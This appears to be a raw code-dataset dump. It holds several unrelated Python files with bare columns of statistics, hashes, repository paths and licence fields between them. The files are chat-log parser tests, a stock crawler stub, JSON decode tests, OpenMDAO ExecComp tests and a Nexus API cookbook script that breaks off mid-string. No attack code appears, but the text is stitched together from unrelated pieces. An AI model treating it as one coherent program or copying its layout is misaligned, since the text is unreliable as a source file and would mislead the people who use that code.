message.setter == joseph assert message.subject == joseph assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject.is_me() assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == jacob assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == jacob assert message.new_nickname == 'Jake' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject.is_me() assert message.new_nickname == 'John' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == joseph assert message.new_nickname == 'Joe' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject.is_me() assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject == joseph assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject == joseph assert message.new_nickname == 'Joe' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject.is_me() assert message.new_nickname == 'John' def test_match_chat_settings_change_message(): chat_feed = SpoofChatFeed() chat_feed.push(content='Jacob named the group Saturday Hangout.') chat_feed.push(content='Jacob changed the group photo.') chat_feed.push(content='Jacob changed the chat theme.') chat_feed.push(content=r'Jacob set the emoji to \u00f0\u009f\u008d\u00ba.') chat_feed.push(content='Jacob turned on member approval and will review' ' requests to join the group.') chat_feed.push(content='Jacob turned off member approval. Anyone with the' ' link can join the group.') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == demuxfb.message.ChatSettingsType.CHANGE_NAME assert message.new_name == 'Saturday Hangout' assert message.new_emoji is None assert message.new_approval_is_required_policy is None message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_PHOTO assert message.new_name is None message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_THEME message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_EMOJI assert message.new_emoji == r'\u00f0\u009f\u008d\u00ba' message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_MEMBERSHIP_POLICY assert message.new_approval_is_required_policy message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_MEMBERSHIP_POLICY assert message.new_approval_is_required_policy is not None assert not message.new_approval_is_required_policy def test_plan_messages(): chat_feed = SpoofChatFeed() chat_feed.push(content='Joseph responded ') chat_feed.push(content='Jacob started a plan.') chat_feed.push(content='Jacob named the plan Saturday Hangout.') chat_feed.push(content='Jacob updated the plan to Sat, Aug 5 at 12 PM.') chat_feed.push(content='Joseph responded ') chat_feed.push(content='Jacob deleted the plan Saturday Hangout for Sat,' ' Aug 5 at 12 PM.') chat_feed.push(content='Joseph responded ') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.TextMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanCreationMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanUpdateMessage) assert message.new_plan_title == 'Saturday Hangout' assert message.new_plan_time is None message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanUpdateMessage) assert message.new_plan_title is None assert message.new_plan_time == 'Sat, Aug 5 at 12 PM' message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanRespondencyMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanDeletionMessage) assert message.plan_title == 'Saturday Hangout' assert message.plan_time == 'Sat, Aug 5 at 12 PM' message = messages.pop(0) assert isinstance(message, demuxfb.message.TextMessage)
38.666667
80
0.704824
1,453
12,064
5.738472
0.13214
0.08887
0.057568
0.084313
0.830295
0.794195
0.752459
0.710242
0.679539
0.644519
0
0.011648
0.195872
12,064
311
81
38.790997
0.847851
0.030421
0
0.609959
0
0
0.153478
0.031568
0
0
0
0
0.448133
1
0.024896
false
0
0.012448
0
0.037344
0
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
6
213266dedf1be75a442f2d2d047405334de761d6
241
py
Python
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
3
2020-12-24T10:16:09.000Z
2022-03-02T16:17:58.000Z
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
null
null
null
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
null
null
null
from library.daily_craw_config import * class daily_crawler(): def __init__(self, db_name, daily_craw_db_name, daily_buy_list_db_name): self.cc = daily_craw_config(db_name, daily_craw_db_name, daily_buy_list_db_name)
26.777778
89
0.763485
39
241
4.076923
0.410256
0.226415
0.27673
0.188679
0.490566
0.490566
0.490566
0.490566
0.490566
0.490566
0
0
0.165975
241
8
90
30.125
0.791045
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
6
2152ac5ce747f783cca177369fadf7289001def4
544
py
Python
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (c) 2021~2999 - Cologler <skyoflw@gmail.com> # ---------- # # ---------- from jsonxx import loads def test_null(): assert loads('null') == None def test_false(): assert loads('false') == False def test_true(): assert loads('true') == True def test_int(): assert loads('123') == 123 def test_str(): assert loads('"123"') == "123" def test_array(): assert loads('["123", 123, false]') == ["123", 123, False] def test_object(): assert loads('{"123": 123}') == {"123": 123}
18.133333
62
0.564338
70
544
4.285714
0.385714
0.163333
0.186667
0.226667
0.16
0.16
0
0
0
0
0
0.10274
0.194853
544
29
63
18.758621
0.582192
0.180147
0
0
0
0
0.138952
0
0
0
0
0
0.466667
1
0.466667
true
0
0.066667
0
0.533333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
1
0
0
0
1
0
0
6
215c18211d0ea463f59a3a00c355a288c23a8ff7
87
py
Python
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
def A(): return ValueError try: raise ValueError() # breaks except A(): pass
14.5
33
0.632184
11
87
5
0.818182
0
0
0
0
0
0
0
0
0
0
0
0.252874
87
5
34
17.4
0.846154
0.068966
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0.25
0
0.25
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
1
0
0
0
6
2166d0a2bf1e7a466d4dd60309db4af4e7a7d64c
44
py
Python
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
from Face_rec.FaceClass import FaceIndentity
44
44
0.909091
6
44
6.5
1
0
0
0
0
0
0
0
0
0
0
0
0.068182
44
1
44
44
0.95122
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
dcc9b73c34092a6b70af02c32dae9efec5b5d1a2
36
py
Python
tests/selenium_tests/jbrowse_selenium/__init__.py
rbuels/jbrowse
a4cfc3234f4708ee86b719f9f10a2b6c606c03ff
[ "Artistic-2.0" ]
319
2015-01-05T14:42:43.000Z
2022-03-30T12:55:07.000Z
tests/selenium_tests/jbrowse_selenium/__init__.py
rbuels/jbrowse
a4cfc3234f4708ee86b719f9f10a2b6c606c03ff
[ "Artistic-2.0" ]
1,065
2015-01-06T08:50:10.000Z
2022-03-25T21:01:48.000Z
tests/selenium_tests/jbrowse_selenium/__init__.py
Julboteroc/csmb
90991f64ed86a018a40910a83df00585e8e70ee5
[ "Artistic-2.0" ]
191
2015-01-20T03:41:12.000Z
2022-03-09T03:32:17.000Z
from JBrowseTest import JBrowseTest
18
35
0.888889
4
36
8
0.75
0
0
0
0
0
0
0
0
0
0
0
0.111111
36
1
36
36
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
dccb701273674683e54722dc115503efec6f6227
14
py
Python
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
47
2015-01-26T22:06:53.000Z
2022-01-04T15:11:14.000Z
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
16
2015-02-20T18:12:22.000Z
2021-12-17T09:49:19.000Z
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
45
2015-01-29T02:47:39.000Z
2022-01-26T12:50:27.000Z
""" XHTML """
3.5
5
0.357143
1
14
5
1
0
0
0
0
0
0
0
0
0
0
0
0.214286
14
3
6
4.666667
0.454545
0.357143
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
0d0490c1dd27fbb9dc31b3e3c4f160a8d649b483
35
py
Python
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
19
2019-07-15T21:17:07.000Z
2021-04-25T12:52:11.000Z
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
null
null
null
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
1
2020-12-29T20:56:34.000Z
2020-12-29T20:56:34.000Z
from .format_string_finder import *
35
35
0.857143
5
35
5.6
1
0
0
0
0
0
0
0
0
0
0
0
0.085714
35
1
35
35
0.875
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0d4ea72b0ecfdbd782e0e8275750f111f3c836c5
87
py
Python
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
class Dictionary: def get_sub_dictionary(self): return Dictionary pass
17.4
33
0.689655
10
87
5.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.264368
87
4
34
21.75
0.90625
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0.25
0
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
1
1
0
0
6
b4f83a89b5bdfc79d43aec7f8dd11856fce58d65
167
py
Python
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
2
2022-01-16T04:30:00.000Z
2022-01-23T08:04:47.000Z
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
null
null
null
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
5
2020-09-01T01:11:43.000Z
2022-01-21T10:32:32.000Z
mult_3_5 = lambda x: x%3==0 or x%5==0 print(mult_3_5(3)) print(mult_3_5(4)) print(mult_3_5(5)) def add1(): return lambda x: x + 1 f = add1() print(f(2))
16.7
38
0.592814
39
167
2.333333
0.384615
0.21978
0.263736
0.362637
0
0
0
0
0
0
0
0.145038
0.215569
167
9
39
18.555556
0.549618
0
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0.125
0.25
0.5
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
1
0
6
2ea0c21b1e8dbf9eafbda61beb50c5c176ed442f
80
py
Python
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
from fastapi import Security from fastapi.security.api_key import APIKeyHeader
20
49
0.8625
11
80
6.181818
0.636364
0.323529
0
0
0
0
0
0
0
0
0
0
0.1125
80
3
50
26.666667
0.957746
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2ea6ef9e64d8e0592d8256aee3f6f66b86ce6fe1
29
py
Python
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
11,058
2018-05-29T07:40:06.000Z
2022-03-31T11:38:42.000Z
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
2,105
2018-06-01T10:07:16.000Z
2022-03-31T14:56:42.000Z
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
914
2018-07-27T09:36:14.000Z
2022-03-31T19:56:34.000Z
print("Hello, RustPython!")
9.666667
27
0.689655
3
29
6.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.103448
29
2
28
14.5
0.769231
0
0
0
0
0
0.642857
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
2c176d2b0a2c61369a1dc4302550a8e839bae2ba
11,494
py
Python
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
import unittest import math import numpy as np from openmdao.api import IndepVarComp, Group, Problem, ExecComp from openmdao.devtools.testutil import assert_rel_error class TestExecComp(unittest.TestCase): def test_colon_vars(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=foo:bar+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: failed to compile expression 'y=foo:bar+1.'.") def test_bad_kwargs(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=x+1.', xx=2.0)) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: arg 'xx' in call to ExecComp() does not refer to any variable in the expressions ['y=x+1.']") def test_bad_kwargs_meta(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=x+1.', x={'val': 2.0, 'low': 0.0, 'high': 10.0, 'units': 'ft'})) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: the following metadata names were not recognized for variable 'x': ['high', 'low', 'val']") def test_name_collision_const(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('e=x+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot assign to variable 'e' because it's already defined as an internal function or constant.") def test_name_collision_func(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('sin=x+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot assign to variable 'sin' because it's already defined as an internal function or constant.") def test_func_as_rhs_var(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=sin+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot use 'sin' as a variable because it's already defined as an internal function.") def test_mixed_type(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=numpy.sum(x)', x=np.arange(10,dtype=float))) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 45.0, 0.00001) def test_simple(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=x+1.', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 3.0, 0.00001) def test_for_spaces(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y = pi * x', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) self.assertTrue('pi' not in C1._inputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 2 * math.pi, 0.00001) def test_units(self): prob = Problem(model=Group()) prob.model.add_subsystem('indep', IndepVarComp('x', 100.0, units='cm')) C1 = prob.model.add_subsystem('C1', ExecComp('y=x+z+1.', x={'value': 2.0, 'units': 'm'}, y={'units': 'm'}, z=2.0)) prob.model.connect('indep.x', 'C1.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 4.0, 0.00001) def test_math(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=sin(x)', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], math.sin(2.0), 0.00001) def test_array(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=x[1]', x=np.array([1.,2.,3.]), y=0.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 2.0, 0.00001) def test_array_lhs(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp(['y[0]=x[1]', 'y[1]=x[0]'], x=np.array([1.,2.,3.]), y=np.array([0.,0.]))) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], np.array([2.,1.]), 0.00001) def test_simple_array_model(self): prob = Problem() prob.model = Group() prob.model.add_subsystem('p1', IndepVarComp('x', np.ones([2]))) prob.model.add_subsystem('comp', ExecComp(['y[0]=2.0*x[0]+7.0*x[1]', 'y[1]=5.0*x[0]-3.0*x[1]'], x=np.zeros([2]), y=np.zeros([2]))) prob.model.connect('p1.x', 'comp.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() data = prob.check_partials(out_stream=None) assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5) def test_simple_array_model2(self): prob = Problem() prob.model = Group() prob.model.add_subsystem('p1', IndepVarComp('x', np.ones([2]))) prob.model.add_subsystem('comp', ExecComp('y = mat.dot(x)', x=np.zeros((2,)), y=np.zeros((2,)), mat=np.array([[2.,7.],[5.,-3.]]))) prob.model.connect('p1.x', 'comp.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() data = prob.check_partials(out_stream=None) assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5) def test_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp(['y=2.0*x+1.'], x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 5.0, 0.00001) C1._linearize() assert_rel_error(self, C1.jacobian[('y','x')], [[-2.0]], 0.00001) def test_complex_step2(self): prob = Problem(Group()) prob.model.add_subsystem('p1', IndepVarComp('x', 2.0)) prob.model.add_subsystem('comp', ExecComp('y=x*x + x*2.0')) prob.model.connect('p1.x', 'comp.x') prob.set_solver_print(level=0) prob.setup(check=False, mode='fwd') prob.run_model() J = prob.compute_total_derivs(['comp.y'], ['p1.x'], return_format='flat_dict') assert_rel_error(self, J['comp.y', 'p1.x'], np.array([[6.0]]), 0.00001) prob.setup(check=False, mode='rev') prob.run_model() J = prob.compute_total_derivs(['comp.y'], ['p1.x'], return_format='flat_dict') assert_rel_error(self, J['comp.y', 'p1.x'], np.array([[6.0]]), 0.00001) def test_abs_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=2.0*abs(x)', x=-2.0)) prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 4.0, 0.00001) # any negative C1.x should give a 2.0 derivative for dy/dx C1._inputs['x'] = -1.0e-10 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], [[2.0]], 0.00001) C1._inputs['x'] = 3.0 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], [[-2.0]], 0.00001) C1._inputs['x'] = 0.0 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], [[-2.0]], 0.00001) def test_abs_array_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=2.0*abs(x)', x=np.ones(3)*-2.0, y=np.zeros(3))) prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], np.ones(3)*4.0, 0.00001) # any negative C1.x should give a 2.0 derivative for dy/dx C1._inputs['x'] = np.ones(3)*-1.0e-10 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*2.0, 0.00001) C1._inputs['x'] = np.ones(3)*3.0 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*-2.0, 0.00001) C1._inputs['x'] = np.zeros(3) C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*-2.0, 0.00001) C1._inputs['x'] = np.array([1.5, -0.6, 2.4]) C1._linearize() expect = np.zeros((3,3)) expect[0,0] = -2.0 expect[1,1] = 2.0 expect[2,2] = -2.0 assert_rel_error(self, C1.jacobian['y','x'], expect, 0.00001) if __name__ == "__main__": unittest.main()
37.439739
129
0.551853
1,633
11,494
3.74158
0.10594
0.051064
0.075614
0.094272
0.851064
0.823241
0.819149
0.799509
0.776105
0.755646
0
0.055463
0.272142
11,494
306
130
37.562092
0.674874
0.009831
0
0.58296
0
0.022422
0.103885
0.003867
0
0
0
0
0.269058
1
0.085202
false
0
0.022422
0
0.112108
0.058296
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2596e05d2a9716d2c3d88428dd880f441aa74095
85,981
py
Python
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
#!/usr/bin/env python # # cookbook.py - Nexus API Lesson Cook Book # # This program teaches you how to use the Nexus APIs. It is an interactive # walk through of each API that is supported by Nexus Tritium and what # parameters you need to for a restful call. # # The user interface will also use the python SDK but allows the user to # curl directly to any Nexus node on the network. # # Usage: python cookbook.py [<port>] # # This program has depends on the nexus_sdk.py SDK library where the master # copy is in LLL-TAO/sdk/nexus_sdk.py. A shadow copy is in a peer # directory in TAO-App/sdk/nexus_sdk.py and this application directory # symlinks to the sdk library (via "import nexus_sdk as nexus").. # #------------------------------------------------------------------------------ import commands import bottle import sys import json import socket import os try: sdk_dir = os.getcwd().split("/")[0:-2] sdk_dir = "/".join(sdk_dir) + "/sdk" sys.path.append(sdk_dir) import nexus_sdk as nexus except: print "Need to place nexus_sdk.py in this directory" exit(0) #endtry # # Did command line have a port number to listen to? # cookbook_port = int(sys.argv[1]) if (len(sys.argv) == 2) else 1111 # # Nexus node to query for API. A change to the SDK URL needs a call to # nexus_sdk.change_sdk_url(). # nexus_api_node = "http://localhost:8080" nexus_sdk_node = "http://localhost:8080" # # Keep track of last username logged in. # nexus_api_last_username = None nexus_sdk_last_username = None #------------------------------------------------------------------------------ def green(string): output = '<font color="green">{}</font>'.format(string) return(output) #enddef def red(string): output = '<font color="red">{}</font>'.format(string) return(output) #enddef def blue(string): output = '<font color="blue">{}</font>'.format(string) return(output) #enddef def bold(string): string = string.replace("[1m", "<b>") string = string.replace("[0m", "</b>") return(string) #enddef # # hl - highlight string # # Take the string "{}<method>/<verb>/<noun>?" or "{}<method>/<verb>/<noun>{}" # and replacae the occurence of "<verb/<noun>" in blue. # def hl(string): left = string.find("/") right = string.find("?") if (right == -1): right = string.find("{", 2) s = string[left+1:right] s = string.replace(s, blue(s)) return(s) #enddef # # curl # # Call curl and return json. # def curl(api_command): global nexus_api_node url = "{}/{}".format(nexus_api_node, api_command) output = commands.getoutput('curl --silent "{}"'.format(url)) if (output == "" or output == None): return({"error" : "curl failed, nexus daemon may not be running"}) #endif return(json.loads(output)) #enddef # # sid_to_sdd # # To keep session continuity across web pages. # contexts = {} def sid_to_sdk(sid): global contexts if (contexts.has_key(sid)): return(contexts[sid], "") output = ('"error": Login session {} 